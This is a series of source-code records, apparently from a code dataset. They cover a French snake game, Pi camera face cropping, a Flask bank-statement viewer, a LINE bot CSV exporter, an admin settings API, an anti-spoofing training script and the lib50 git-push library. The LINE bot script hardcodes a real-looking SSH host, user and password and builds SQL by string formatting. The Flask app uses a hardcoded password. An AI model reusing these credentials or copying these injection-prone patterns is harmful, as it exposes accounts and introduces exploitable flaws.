padx=5, pady=5)\n return None\n\n\n# --------------------\ndef kelsonlestouches():\n toplevel = Toplevel()\n frame = Frame(toplevel)\n Label(frame, text=TITRE_REGLES_TOUCHES).pack()\n Label(frame, text=REGLES_TOUCHES, font=FONT_MENU, justify=LEFT).pack()\n frame.pack(ipadx=5, ipady=5, padx=5, pady=5)\n return None\n\n\n# -------------------- \ndef ask_quit(root):\n top = Toplevel()\n \n Label(top, text='Etes vous sur de vouloir quitter ce superbe jeu ?').pack()\n \n frame_button = Frame(top)\n \n Button(frame_button, text='Annuler', command=top.destroy).pack(side=LEFT, expand=True)\n Button(frame_button, text='Quitter', command=root.destroy).pack(side=LEFT, expand=True)\n \n frame_button.pack(fill=BOTH, expand=True)\n return None\n\n\n# --------------------\ndef set_taille_plateau(taille_plateau):\n if taille_plateau.get() == 'Petit':\n return (6, 6), (0, 11, 13, 15)\n elif taille_plateau.get() == 'Moyen':\n return (8, 8), (0, 9, 10, 11)\n elif taille_plateau.get() == 'Grand':\n return (10, 10), (0, 9, 10, 11)\n else:\n return (12, 12), (0, 8, 9, 10)\n\n\n# --------------------\ndef set_profondeur(difficulte, profondeurs):\n if difficulte.get() == 'Facile':\n return profondeurs[0]\n elif difficulte.get() == 'Moyen':\n return profondeurs[1]\n elif difficulte.get() == 'Difficile':\n return profondeurs[2]\n else:\n return profondeurs[3]\n\n# --------------------------------------------------- #\n# -------------------- FUNCTIONS INGAME\n\n# -------------------- fin de partie\ndef fin_partie(player):\n if player.jepeuallerla == list():\n return True\n\n else:\n return False\n\n\n# -------------------- affiche qui est le meilleur joueur\ndef cmoileplufort(gagnant):\n if gagnant == \"égalité\":\n text_victoire = 'Le gagnant est... Euh... Il n\\'y en a pas... Nous sommes face à une égalité...'\n elif gagnant.psyche == 'IA':\n text_victoire = 'Le gagnant est %s,\\nla super intelligence artificielle :p' % gagnant.nom\n else:\n text_victoire = 'Le gagnant est %s !!' % gagnant.nom\n messagebox.showinfo(\"And the winner is...\", text_victoire)\n return None\n\n\n# -------------------- fonction pour kantutemangelebonus\ndef kantutemangelebonus(plateau, enemy):\n if len(enemy.body) == 1:\n return False\n elif len(enemy.body) > 5:\n nb_suppr = 5\n else:\n nb_suppr = len(enemy.body) - 1\n\n # comme le for demarre a 1 on fait +1 a la fin\n for i in range(1, nb_suppr + 1):\n enemy.body[-i].delete(plateau=plateau)\n enemy.body = enemy.body[:-nb_suppr]\n\n enemy.head.delete(plateau=plateau)\n enemy.head = Head(plateau=plateau,\n new_x=enemy.body[-1].x,\n new_y=enemy.body[-1].y,\n n=enemy.n)\n return None\n\n\n# -------------------- heeeeeeeeeeeeeeeeuristik\ndef heuristique_2_0(plateau, taille_plateau, player, enemy):\n\n case_atteignable_player = []\n case_atteignable_enemy = []\n\n n_case_atteignable_player = [[player.head.y, player.head.x], ]\n n_case_atteignable_enemy = [[enemy.head.y, enemy.head.x], ]\n\n while not n_case_atteignable_player == [] or not n_case_atteignable_enemy == []:\n\n temp_player = []\n for case in n_case_atteignable_player:\n\n if case[0] != 0:\n if plateau[case[0] - 1, case[1]] in [0, -1]:\n temp_player.append([case[0] - 1, case[1]])\n\n if case[0] != taille_plateau[1] - 1:\n if plateau[case[0] + 1, case[1]] in [0, -1]:\n temp_player.append([case[0] + 1, case[1]])\n\n if case[1] != 0:\n if plateau[case[0], case[1] - 1] in [0, -1]:\n temp_player.append([case[0], case[1] - 1])\n\n if case[1] != taille_plateau[0] - 1:\n if plateau[case[0], case[1] + 1] in [0, -1]:\n temp_player.append([case[0], case[1] + 1])\n\n n_case_atteignable_player = []\n for case in temp_player:\n if case not in case_atteignable_enemy and case not in case_atteignable_player and case not in n_case_atteignable_player:\n n_case_atteignable_player.append(case)\n\n case_atteignable_player += n_case_atteignable_player\n\n temp_enemy = []\n for case in n_case_atteignable_enemy:\n\n if case[0] != 0:\n if plateau[case[0] - 1, case[1]] in [0, -1]:\n temp_enemy.append([case[0] - 1, case[1]])\n\n if case[0] != taille_plateau[1] - 1:\n if plateau[case[0] + 1, case[1]] in [0, -1]:\n temp_enemy.append([case[0] + 1, case[1]])\n\n if case[1] != 0:\n if plateau[case[0], case[1] - 1] in [0, -1]:\n temp_enemy.append([case[0], case[1] - 1])\n\n if case[1] != taille_plateau[0] - 1:\n if plateau[case[0], case[1] + 1] in [0, -1]:\n temp_enemy.append([case[0], case[1] + 1])\n\n n_case_atteignable_enemy = []\n for case in temp_enemy:\n if case not in case_atteignable_player and case not in case_atteignable_enemy and case not in n_case_atteignable_enemy:\n n_case_atteignable_enemy.append(case)\n\n case_atteignable_enemy += n_case_atteignable_enemy\n \n return len(case_atteignable_player), len(case_atteignable_enemy)\n\n\n# --------------------------------------------------- #\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"463427049","text":"from time import sleep\nfrom picamera import PiCamera\nfrom picamera import array\nimport cv2 \n\ndef detect_faces(cascade, test_image, scaleFactor = 1.1):\n # create a copy of the image to prevent any changes to the original one.\n image_copy = test_image.copy()\n \n gray_image = test_image\n \n # Applying the haar classifier to detect faces\n faces_rect = cascade.detectMultiScale(gray_image, scaleFactor=scaleFactor, minNeighbors=5)\n\n #Create an list of images if a face is found crop that face and append it to\n #the list, return the list when done\n img =[]\n for (x, y, w, h) in faces_rect:\n cv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 15)\n img.append(image_copy[y:y+h, x:x+h].copy())\n \n return img\n\nif __name__ == \"__main__\":\n #The purpose of this program was to test multiple face detection using the camera\n\n \n camera = PiCamera()\n camera.resolution = (1024, 768)\n camera.start_preview()\n \n # Camera warm-up time\n sleep(2)\n\n #creating a RGB array from PiCamera's classes to avoid encoding and decoding a jpeg\n #ideally speeding up the process, then formating it a BGR array so we can pass it to OpenCV\n stream = array.PiRGBArray(camera)\n camera.capture(stream, format='bgr') \n image = stream.array\n \n haar_cascade_face = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n faces = detect_faces(haar_cascade_face, image)\n i = 0\n #Check for faces in result and write it to a png file\n for face in faces:\n fileName = f\"result{i}.png\"\n cv2.imwrite(fileName,face)\n i+=1\n \n #Following lines are just for showing results to screen, press 'O' to close window\n cv2.imshow('res', face)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"croping_multiple_faces_using_camera.py","file_name":"croping_multiple_faces_using_camera.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444059205","text":"from flask import Flask, render_template, request, redirect, session #Importa a biblioteca do microframework Flask do diretório \"flask\"\nfrom CreditoNu import Boleto #Imposta a classe \"Boleto\" do diretório \"CreditoNu\"\nboleto = 'nubank-2019-04.csv' #Especifíca o título do arquivo que será extraído\ndata = '2019-03-09' #Especifíca a data que será pesquisada\n\ncategoria1 = 'restaurante' #Especifíca a categoria 1\ncategoria2 = 'servicos' # // // // 2\ncategoria3 = 'transporte' # // // // 3\n\napp = Flask(__name__)\n\ndata = 0\nteste = 0\n\n\n@app.route('/')\ndef index():\n return render_template('inicio.html', titulo = 'Pesquisa')\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n\n@app.route('/autenticar', methods=['POST',])\ndef autenticar():\n if 'mestra' == request.form['senha']:\n #session['usuario_logado'] = request.form['usuario']\n return redirect('/')\n else:\n return redirect('/login')\n\n\n@app.route('/pesquisar', methods=['POST',])\ndef pesquisar():\n extrato = request.form['extrato']\n data = request.form['data']\n teste = Boleto(extrato) # Variável recebe a classe \"Boleto\" com a variável \"boleto\" passada como parâmentro\n return render_template('painel.html',\n data='2019-07',\n quantidade=teste.quantidadeTransacoes(),\n extrato=teste.lista,\n maiorGasto=teste.maiorGasto(),\n valorGastoTotal=teste.valorGastoTotal(),\n valorPagoTotal=teste.valorPagoTotal(),\n categoria=categoria3.capitalize(),\n valorCategoria=teste.valorTransacoesPorCategoria(categoria3),\n Data=data,\n transacoesData=teste.mostraTransacoesPorData(data))\n\n\napp.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"426250362","text":"from linebot.models import *\nfrom datetime import datetime\nimport os\nimport csv\nfrom paramiko import SSHClient,AutoAddPolicy\nfrom func.scp import SCPClient\nfrom linebot import (\n LineBotApi\n)\nchannel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)\nline_bot_api = LineBotApi(channel_access_token)\n\ndef Excel(thing_id, userid, con) :\n db = con.cursor()\n db.execute(\"SELECT * FROM buy_list WHERE thing_id={}\".format(thing_id))\n data = db.fetchall()\n os.system(\"touch profile.csv\")\n file = open('profile.csv', 'w',encoding='utf-8-sig')\n csvCursor = csv.writer(file)\n csvCursor.writerow(['買家姓名','Line暱稱','電話','購買數量','是否出貨','購買時間'])\n for d in data :\n profile = line_bot_api.get_profile(d[3])\n db.execute(\"SELECT name,phone FROM user_list WHERE userid='{}'\".format(d[3]))\n data_2 = db.fetchone()\n if d[4]=='check' :\n status = 'yes'\n else :\n status = 'no'\n csvCursor.writerow([data_2[0],profile.display_name,data_2[1],d[2],status,d[5]])\n print ([data_2[0],profile.display_name,data_2[1],d[2],status,d[5]])\n file.close()\n server = \"cscc.hsexpert.net\"\n port = 22\n user = \"apie0419\"\n password = \"a19970419\"\n client = SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(AutoAddPolicy())\n client.connect(server, port, user, password)\n scp = SCPClient(client.get_transport())\n scp.put('profile.csv','public_html/chatbot-excels/{}.csv'.format(userid))\n scp.close()\n return TextSendMessage(text=\"stu-web.tkucs.cc/404411240/chatbot-excels/{}.csv\".format(userid))\n","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"612823325","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\n# @Time : 2017/11/1 ~ 2019/9/1\n# @Author : Allen Woo\nfrom flask import request\nfrom apps.core.flask.login_manager import osr_login_required\n\nfrom apps.configs.sys_config import METHOD_WARNING\nfrom apps.core.blueprint import api\nfrom apps.core.flask.permission import permission_required\nfrom apps.core.flask.response import response_format\n\nfrom apps.modules.setting.process.settings import sys_config_version, conf_version_switch, get_sys_configs, \\\n sys_config_edit\n\n\n@api.route('/admin/setting/sys/config/version', methods=['GET', 'PUT'])\n@osr_login_required\n@permission_required()\ndef api_sys_config_version():\n \"\"\"\n GET:\n 获取所有的系统配置版本, 和网站服务器主机\n PUT:\n 切换单个节点网站的配置版本\n switch_version:, 需要切换的版本号\n diable_update: , 0 or 1\n host_ip:, 主机ip\n\n :return:\n \"\"\"\n if request.c_method == \"GET\":\n data = sys_config_version()\n elif request.c_method == \"PUT\":\n data = conf_version_switch()\n else:\n data = {\"msg_type\": \"w\", \"msg\": METHOD_WARNING, \"custom_status\": 405}\n return response_format(data)\n\n\n@api.route('/admin/setting/sys/config', methods=['GET', 'PUT'])\n@osr_login_required\n@permission_required()\ndef api_sys_config():\n \"\"\"\n GET:\n 根据project获取当前最新配置(特殊配置将不会返回,如不允许再页面编辑的,即那些不带有\"__restart__\"key的)\n project:, 能同时获取多个project的数据.不使用此参数则表示获取全部配置\n keyword:, 搜索匹配关键字的结构\n only_project_field:, 只需要project字段. 0 or 1.默认为0\n PUT:\n key:, 要设置的配制参数的key\n project:, 项目,比如这个key是comment下的,则project为comment\n value:, key对应的值\n info:, 说明\n\n :return:\n \"\"\"\n if request.c_method == \"GET\":\n data = get_sys_configs()\n elif request.c_method == \"PUT\":\n data = sys_config_edit()\n else:\n data = {\"msg_type\": \"w\", \"msg\": METHOD_WARNING, \"custom_status\": 405}\n return response_format(data)\n","sub_path":"apps/modules/setting/apis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"190801833","text":"import os\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision.transforms as transforms\r\nfrom model.model import Spoofing\r\nfrom model.model import Classifier\r\nfrom dataset import faceDataset\r\nfrom loss import TripletLoss\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom model.network import ResnetUnetHybrid\r\n \r\nif __name__ == '__main__':\r\n \r\n torch.manual_seed(1234)\r\n torch.cuda.manual_seed(1234)\r\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n \r\n # Read data from numpy file\r\n train_data = np.load('train_data.npy')\r\n train_label = np.load('train_label.npy')\r\n train_dataset = faceDataset('oulu_train', './oulu/train', data=train_data, label=train_label)\r\n print(train_data.shape)\r\n val_data = np.load('val_data.npy')\r\n val_label = np.load('val_label.npy')\r\n val_dataset = faceDataset('oulu_train', './oulu/val', data=val_data, label=val_label, sequence=True)\r\n print(val_data.shape)\r\n batch_size = 16\r\n train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\r\n val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)\r\n\r\n model = Spoofing(in_channels=4).cuda()\r\n classifier = Classifier(pretrained=True).cuda()\r\n depth_generator = ResnetUnetHybrid.load_pretrained(device = device)\r\n\r\n lr = 1e-4\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\r\n optimizer_classifier = torch.optim.Adam(classifier.parameters(), lr=lr)\r\n \r\n decay_rate = 0.95\r\n lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=decay_rate)\r\n lr_scheduler_classifier = torch.optim.lr_scheduler.StepLR(optimizer_classifier, 1, gamma=decay_rate)\r\n \r\n triplet_loss = TripletLoss()\r\n bce_loss_cuda = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([4]).cuda())\r\n bce_loss = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([4]))\r\n MSE_loss = nn.MSELoss()\r\n normal_bce = nn.BCEWithLogitsLoss()\r\n \r\n num_epoch = 40\r\n best_val_auc = 0\r\n best_loss = 9999\r\n \r\n print('Start train')\r\n depth_generator.eval()\r\n for epoch in range(num_epoch):\r\n model.train()\r\n classifier.train()\r\n train_loss = 0\r\n\r\n for i, (data, label) in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n optimizer_classifier.zero_grad()\r\n # data : [batch, 3, size, size]\r\n # label : [batch, 1]\r\n # cue_output, score = model(data.cuda())\r\n depth_map = depth_generator(data.cuda() * label.view(-1, 1, 1, 1).cuda())\r\n depth_map = F.interpolate(depth_map, size=(224, 224), mode='bicubic', align_corners=False)\r\n # RGBD_data = torch.cat((data.cuda(), depth_map), 1)\r\n cue_output, score = model(data.cuda())\r\n \r\n # binary loss \r\n classifier_loss = bce_loss_cuda(score, label.cuda())\r\n # classifier_loss = cross_loss(score, label.view(-1).long().cuda())\r\n\r\n # cue_map loss (L2_loss)\r\n # cup_output[-1] shape: [batch, 1, size, size]\r\n\r\n # cue_map = cue_output[-1] * label.view(-1, 1, 1, 1).cuda()\r\n # live_num = torch.sum(label)\r\n # reg_loss = torch.sum(torch.abs(cue_map)) / (live_num + 1e-9)\r\n reg_loss = MSE_loss(cue_output[-1], depth_map)\r\n\r\n # Triplet loss\r\n trip_loss = 0\r\n for feat in cue_output[:-1]:\r\n feat = F.adaptive_avg_pool2d(feat, [1, 1]).view(cue_output[-1].shape[0], -1)\r\n trip_loss += triplet_loss(feat, label.view(-1, 1).cuda())\r\n\r\n total_loss = 1*classifier_loss + 2*reg_loss + 1*trip_loss\r\n total_loss.backward()\r\n optimizer.step()\r\n optimizer_classifier.step()\r\n train_loss += total_loss.item()\r\n print('\\r[{}/{}] {}/{} train_loss: {:9.5f}'.format( \\\r\n epoch+1, num_epoch, i+1, len(train_loader), train_loss/(i+1)), end='')\r\n\r\n torch.cuda.empty_cache()\r\n lr_scheduler.step()\r\n lr_scheduler_classifier.step()\r\n\r\n # Validation\r\n cue_threshold = 0.01\r\n model.eval()\r\n classifier.eval()\r\n with torch.no_grad():\r\n output = np.zeros(1)\r\n valid_loss = 0\r\n for i, (data, label) in enumerate(val_loader):\r\n batch = data.shape[0]\r\n data = data.view(-1, 3, val_dataset.new_size, val_dataset.new_size)\r\n # depth_map = depth_generator(data.cuda())\r\n # depth_map = F.interpolate(depth_map, size=(224, 224), mode='bicubic', align_corners=False)\r\n # RGBD_data = torch.cat((data.cuda(), depth_map), 1)\r\n output_cue, score = model(data.cuda())\r\n # score = classifier(model.encoder(output_cue[-1].detach() + data.cuda())[-1])\r\n\r\n # for cross entropy\r\n # score = torch.softmax(score, dim=1)\r\n # max_score = torch.max(score, dim=1)[0]\r\n # index = torch.max(score, dim=1)[1]\r\n # max_score[index == 0] = -max_score[index == 0] + 1\r\n # score = max_score.cpu().numpy().reshape(batch, 11)\r\n # output = np.concatenate((output, np.mean(score, axis=1)))\r\n\r\n score = torch.sigmoid(score)\r\n\r\n # non_zero = (output_cue != 0)\r\n # score = score.cpu().numpy().reshape(batch, 11)\r\n # output = np.concatenate((output, np.sum(output_cue * score, axis=1) / non_zero.sum(axis=1)))\r\n score = score.cpu().numpy().reshape(batch, 11)\r\n output = np.concatenate((output, np.mean(score, axis=1)))\r\n output = output[1:]\r\n groundtruth = np.mean(val_label, axis=1).astype(np.uint8)\r\n valid_loss = bce_loss(torch.Tensor(output), torch.Tensor(groundtruth)).item()\r\n valid_auc = roc_auc_score(groundtruth, output)\r\n print('\\nAUC socre: {} Classifier loss: {}'.format(valid_auc, valid_loss))\r\n if valid_loss < best_loss and epoch > 10:\r\n best_loss = valid_loss\r\n torch.save(model.state_dict(), 'spoofer.pth')\r\n print('Save model !')\r\n # torch.save(classifier.state_dict(), 'classifier.pth')\r\n torch.cuda.empty_cache()\r\n\r\n\r\n","sub_path":"train_RGBD.py","file_name":"train_RGBD.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"173634922","text":"import collections\nimport contextlib\nimport copy\nimport datetime\nimport fnmatch\nimport gettext\nimport glob\nimport itertools\nimport logging\nimport os\nfrom pathlib import Path\nimport pkg_resources\nimport re\nimport shutil\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport threading\nimport termios\nimport time\nimport tty\nimport functools\n\nimport attr\nimport jellyfish\nimport pexpect\nimport requests\nimport termcolor\nimport yaml\n\nfrom . import _, get_local_path\nfrom ._errors import *\nfrom . import config as lib50_config\n\n__all__ = [\"push\", \"local\", \"working_area\", \"files\", \"connect\",\n \"prepare\", \"authenticate\", \"upload\", \"logout\", \"ProgressBar\",\n \"fetch_config\", \"get_local_slugs\", \"check_github_status\", \"Slug\", \"cd\"]\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n_CREDENTIAL_SOCKET = Path(\"~/.git-credential-cache/lib50\").expanduser()\nDEFAULT_PUSH_ORG = \"me50\"\nAUTH_URL = \"https://submit.cs50.io\"\n\n\ndef push(tool, slug, config_loader, repo=None, data=None, prompt=lambda included, excluded: True):\n \"\"\"\n Push to github.com/org/repo=username/slug if tool exists.\n Returns username, commit hash\n \"\"\"\n\n if data is None:\n data = {}\n\n language = os.environ.get(\"LANGUAGE\")\n if language:\n data.setdefault(\"lang\", language)\n\n slug = Slug.normalize_case(slug)\n\n check_dependencies()\n\n # Connect to GitHub and parse the config files\n org, (included, excluded), message = connect(slug, config_loader)\n\n # Authenticate the user with GitHub, and prepare the submission\n with authenticate(org, repo=repo) as user, prepare(tool, slug, user, included):\n\n # Show any prompt if specified\n if prompt(included, excluded):\n username, commit_hash = upload(slug, user, tool, data)\n return username, commit_hash, message.format(username=username, slug=slug, commit_hash=commit_hash)\n else:\n raise Error(_(\"No files were submitted.\"))\n\n\ndef local(slug, offline=False):\n \"\"\"\n Create/update local copy of github.com/org/repo/branch.\n Returns path to local copy\n \"\"\"\n\n # Parse slug\n slug = Slug(slug, offline=offline)\n\n local_path = get_local_path() / slug.org / slug.repo\n\n git = Git().set(\"-C {path}\", path=str(local_path))\n if not local_path.exists():\n _run(Git()(\"init {path}\", path=str(local_path)))\n _run(git(f\"remote add origin https://github.com/{slug.org}/{slug.repo}\"))\n\n if not offline:\n # Get latest version of checks\n _run(git(\"fetch origin {branch}\", branch=slug.branch))\n\n # Ensure that local copy of the repo is identical to remote copy\n _run(git(\"checkout -f -B {branch} origin/{branch}\", branch=slug.branch))\n _run(git(\"reset --hard HEAD\"))\n\n problem_path = (local_path / slug.problem).absolute()\n\n if not problem_path.exists():\n raise InvalidSlugError(_(\"{} does not exist at {}/{}\").format(slug.problem, slug.org, slug.repo))\n\n return problem_path\n\n\n@contextlib.contextmanager\ndef working_area(files, name=\"\"):\n \"\"\"\n Copy all files to a temporary directory (the working area)\n Optionally names the working area name\n Returns path to the working area\n \"\"\"\n with tempfile.TemporaryDirectory() as dir:\n dir = Path(Path(dir) / name)\n dir.mkdir(exist_ok=True)\n\n for f in files:\n dest = (dir / f).absolute()\n dest.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy(f, dest)\n yield dir\n\n\n@contextlib.contextmanager\ndef cd(dest):\n \"\"\" Temporarily cd into a directory\"\"\"\n origin = os.getcwd()\n try:\n os.chdir(dest)\n yield dest\n finally:\n os.chdir(origin)\n\n\ndef files(patterns,\n require_tags=(\"require\",),\n include_tags=(\"include\",),\n exclude_tags=(\"exclude\",),\n root=\".\"):\n \"\"\"\n Takes a list of lib50._config.TaggedValue returns which files should be included and excluded from `root`.\n Any pattern tagged with a tag\n from include_tags will be included\n from require_tags can only be a file, that will then be included. MissingFilesError is raised if missing\n from exclude_tags will be excluded\n Any pattern in always_exclude will always be excluded.\n \"\"\"\n require_tags = list(require_tags)\n include_tags = list(include_tags)\n exclude_tags = list(exclude_tags)\n\n # Ensure tags do not start with !\n for tags in [require_tags, include_tags, exclude_tags]:\n for i, tag in enumerate(tags):\n tags[i] = tag[1:] if tag.startswith(\"!\") else tag\n\n with cd(root):\n # Include everything but hidden paths by default\n included = _glob(\"*\")\n excluded = set()\n\n if patterns:\n missing_files = []\n\n # For each pattern\n for pattern in patterns:\n # Include all files that are tagged with !require\n if pattern.tag in require_tags:\n file = str(Path(pattern.value))\n if not Path(file).exists():\n missing_files.append(file)\n else:\n try:\n excluded.remove(file)\n except KeyError:\n pass\n else:\n included.add(file)\n # Include all files that are tagged with !include\n elif pattern.tag in include_tags:\n new_included = _glob(pattern.value)\n excluded -= new_included\n included.update(new_included)\n # Exclude all files that are tagged with !exclude\n elif pattern.tag in exclude_tags:\n new_excluded = _glob(pattern.value)\n included -= new_excluded\n excluded.update(new_excluded)\n\n if missing_files:\n raise MissingFilesError(missing_files)\n\n # Exclude any files that are not valid utf8\n invalid = set()\n for file in included:\n try:\n file.encode(\"utf8\")\n except UnicodeEncodeError:\n excluded.add(file.encode(\"utf8\", \"replace\").decode())\n invalid.add(file)\n included -= invalid\n\n return included, excluded\n\n\ndef connect(slug, config_loader):\n \"\"\"\n Ensure .cs50.yaml and tool key exists, raises Error otherwise\n Check that all required files as per .cs50.yaml are present\n Returns org, and a tuple of included and excluded files\n \"\"\"\n with ProgressBar(_(\"Connecting\")):\n # Get the config from GitHub at slug\n config_yaml = fetch_config(slug)\n\n # Load config file\n try:\n config = config_loader.load(config_yaml)\n except MissingToolError:\n raise InvalidSlugError(_(\"Invalid slug for {}. Did you mean something else?\").format(config_loader.tool))\n\n # If config of tool is just a truthy value, config should be empty\n if not isinstance(config, dict):\n config = {}\n\n # By default send check50/style50 results back to submit.cs50.io\n remote = {\n \"org\": DEFAULT_PUSH_ORG,\n \"message\": \"Go to https://submit.cs50.io/users/{username}/{slug} to see your results.\",\n \"callback\": \"https://submit.cs50.io/hooks/results\"\n }\n\n remote.update(config.get(\"remote\", {}))\n\n # Figure out which files to include and exclude\n included, excluded = files(config.get(\"files\"))\n\n # Check that at least 1 file is staged\n if not included:\n raise Error(_(\"No files in this directory are expected for submission.\"))\n\n return remote[\"org\"], (included, excluded), remote[\"message\"]\n\n\n@contextlib.contextmanager\ndef authenticate(org, repo=None):\n \"\"\"\n Authenticate with GitHub via SSH if possible\n Otherwise authenticate via HTTPS\n Returns an authenticated User\n \"\"\"\n with ProgressBar(_(\"Authenticating\")) as progress_bar:\n user = _authenticate_ssh(org, repo=repo)\n progress_bar.stop()\n if user is None:\n # SSH auth failed, fallback to HTTPS\n with _authenticate_https(org, repo=repo) as user:\n yield user\n else:\n yield user\n\n\n@contextlib.contextmanager\ndef prepare(tool, branch, user, included):\n \"\"\"\n Prepare git for pushing\n Check that there are no permission errors\n Add necessities to git config\n Stage files\n Stage files via lfs if necessary\n Check that atleast one file is staged\n \"\"\"\n with ProgressBar(_(\"Preparing\")) as progress_bar, working_area(included) as area:\n Git.working_area = f\"-C {shlex.quote(str(area))}\"\n git = Git().set(Git.working_area)\n # Clone just .git folder\n try:\n _run(git.set(Git.cache)(\"clone --bare {repo} .git\", repo=user.repo))\n except Error:\n msg = _(\"Looks like {} isn't enabled for your account yet. \").format(tool)\n if user.org != DEFAULT_PUSH_ORG:\n msg += _(\"Please contact your instructor about this issue.\")\n else:\n msg += _(\"Please go to {} in your web browser and try again.\").format(AUTH_URL)\n\n raise Error(msg)\n\n _run(git(\"config --bool core.bare false\"))\n _run(git(\"config --path core.worktree {area}\", area=str(area)))\n\n try:\n _run(git(\"checkout --force {branch} .gitattributes\", branch=branch))\n except Error:\n pass\n\n # Set user name/email in repo config\n _run(git(\"config user.email {email}\", email=user.email))\n _run(git(\"config user.name {name}\", name=user.name))\n\n # Switch to branch without checkout\n _run(git(\"symbolic-ref HEAD {ref}\", ref=f\"refs/heads/{branch}\"))\n\n # Git add all included files\n _run(git(f\"add -f {' '.join(shlex.quote(f) for f in included)}\"))\n\n # Remove gitattributes from included\n if Path(\".gitattributes\").exists() and \".gitattributes\" in included:\n included.remove(\".gitattributes\")\n\n # Add any oversized files through git-lfs\n _lfs_add(included, git)\n\n progress_bar.stop()\n yield\n\n\ndef upload(branch, user, tool, data):\n \"\"\"\n Commit + push to branch\n Returns username, commit hash\n \"\"\"\n\n with ProgressBar(_(\"Uploading\")):\n commit_message = _(\"automated commit by {}\").format(tool)\n\n data_str = \" \".join(f\"[{key}={val}]\" for key, val in data.items())\n\n commit_message = f\"{commit_message} {data_str}\"\n\n # Commit + push\n git = Git().set(Git.working_area)\n _run(git(\"commit -m {msg} --allow-empty\", msg=commit_message))\n _run(git.set(Git.cache)(\"push origin {branch}\", branch=branch))\n commit_hash = _run(git(\"rev-parse HEAD\"))\n return user.name, commit_hash\n\n\ndef fetch_config(slug):\n \"\"\"\n Fetch the config file at slug from GitHub.\n Returns the unparsed json as a string.\n Raises InvalidSlugError if there is no config file at slug.\n \"\"\"\n # Parse slug\n slug = Slug(slug)\n\n # Get config file (.cs50.yaml)\n try:\n yaml_content = get_content(slug.org, slug.repo, slug.branch, slug.problem / \".cs50.yaml\")\n except InvalidSlugError:\n yaml_content = None\n\n # Get config file (.cs50.yml)\n try:\n yml_content = get_content(slug.org, slug.repo, slug.branch, slug.problem / \".cs50.yml\")\n except InvalidSlugError:\n yml_content = None\n\n # If neither exists, error\n if not yml_content and not yaml_content:\n # Check if GitHub outage may be the source of the issue\n check_github_status()\n\n # Otherwise raise an InvalidSlugError\n raise InvalidSlugError(_(\"Invalid slug: {}. Did you mean something else?\").format(slug))\n\n # If both exists, error\n if yml_content and yaml_content:\n raise InvalidSlugError(_(\"Invalid slug: {}. Multiple configurations (both .yaml and .yml) found.\").format(slug))\n\n return yml_content or yaml_content\n\n\ndef get_local_slugs(tool, similar_to=\"\"):\n \"\"\"\n Get all slugs for tool of lib50 has a local copy.\n If similar_to is given, ranks local slugs by similarity to similar_to.\n \"\"\"\n # Extract org and repo from slug to limit search\n similar_to = similar_to.strip(\"/\")\n parts = Path(similar_to).parts\n entered_org = parts[0] if len(parts) >= 1 else \"\"\n entered_repo = parts[1] if len(parts) >= 2 else \"\"\n\n # Find path of local repo's\n local_path = get_local_path()\n local_repo = local_path / entered_org / entered_repo\n\n if not local_repo.exists():\n local_repo = local_path\n\n # Find all local config files within local_path\n config_paths = []\n for root, dirs, files in os.walk(local_repo):\n try:\n config_paths.append(lib50_config.get_config_filepath(root))\n except Error:\n pass\n\n # Filter out all local config files that do not contain tool\n config_loader = lib50_config.Loader(tool)\n valid_paths = []\n for config_path in config_paths:\n with open(config_path) as f:\n if config_loader.load(f.read(), validate=False):\n valid_paths.append(config_path.relative_to(local_path))\n\n # Find branch for every repo\n branch_map = {}\n for path in valid_paths:\n org, repo = path.parts[0:2]\n if (org, repo) not in branch_map:\n git = Git().set(\"-C {path}\", path=str(local_path / path.parent))\n branch = _run(git(\"rev-parse --abbrev-ref HEAD\"))\n branch_map[(org, repo)] = branch\n\n # Reconstruct slugs for each config file\n slugs = []\n for path in valid_paths:\n org, repo = path.parts[0:2]\n branch = branch_map[(org, repo)]\n problem = \"/\".join(path.parts[2:-1])\n slugs.append(\"/\".join((org, repo, branch, problem)))\n\n return _rank_similar_slugs(similar_to, slugs) if similar_to else slugs\n\n\ndef _rank_similar_slugs(target_slug, other_slugs):\n \"\"\"\n Rank other_slugs by their similarity to target_slug.\n Returns a list of other_slugs in order (most similar -> least similar).\n \"\"\"\n if len(Path(target_slug).parts) >= 2:\n other_slugs_filtered = [slug for slug in other_slugs if Path(slug).parts[0:2] == 